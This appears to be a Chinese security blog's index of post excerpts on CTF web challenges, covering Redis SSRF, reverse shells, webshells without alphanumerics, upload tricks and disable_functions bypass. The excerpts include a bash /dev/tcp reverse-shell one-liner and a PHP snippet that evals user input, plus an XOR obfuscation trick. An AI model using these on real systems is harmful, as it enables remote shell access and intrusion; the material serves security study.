浅析Redis中SSRF的利用
内容承接gkctf的web3。 记得之前还看过ssrf的视频结果因为看不懂就给跳过去了,😓。果然出来混迟早都是要还的。 基础部分 gopher协议: Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到…
24 2020-05-29 阅读更多
linux反弹shell的几种方式和理解
本文的大部分内容都是参考以下的这篇文章的: https://www.freebuf.com/articles/system/178150.html 如果以后有新的姿势的话,还会继续补充的。 方法1 bash -i >& /dev/tcp/ip/port 0>&1 啥意思呢,先看几个知识点: linux下有三个标准的文件描…
31 2020-05-28 阅读更多
无字母数字getshell小结
代码如下: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } 方法一: 利用异或的操作来获取自己需要的字母和数字: <?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='asser…
60 2020-05-20 阅读更多
cgi程序在文件上传漏洞getshell中的利用——[de1ctf 2020]check in
基础 题目是有两种解法的,非预期解是反斜杠可以拼接/.htaccess内的配置项,预期解是cgi执行。这里就先说一下cgi执行,感觉还是蛮有意思的。 PHP在Apache中一共有三种工作方式:CGI模式、Apache模块DLL、FastCGI模式。 .htaccess 如果要让.htaccess文件的配置项生效…
79 2020-05-11 阅读更多
.htaccess文件与文件上传——[XNUCA2019Qualifier]easyphp
easyphp 直接贴出源码: <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } include_once("fl3g.p…
69 2020-05-11 阅读更多
一些编码网站——转载
xssee:http://web2hack.org/xssee xssee:http://evilcos.me/lab/xssee 程默的博客(DES,3DES,AES,RC,Blowfish,Twofish,Serpent,Gost,Rijndael,Cast,Xtea,RSA):http://tool.chacuo.net/cryptdes 在线编码解码(多种并排):http://bianma.911cha.com 在线加密解密(多种)…
44 2020-05-11 阅读更多
disable_functions绕过——安恒月赛web2babytricks
决定还是整理一下,看了几篇相关文章都看不大懂,即使刚修完操作系统。其实在php代码审计2里提到过一点disable_functions的绕过,但是当初写的时候也是迷迷糊糊的,笔记也不是很全面,这里再补充一下。还有感觉以后还是要关注一下linux操作系统吧,然后就想起来了那本…
27 2020-05-05 阅读更多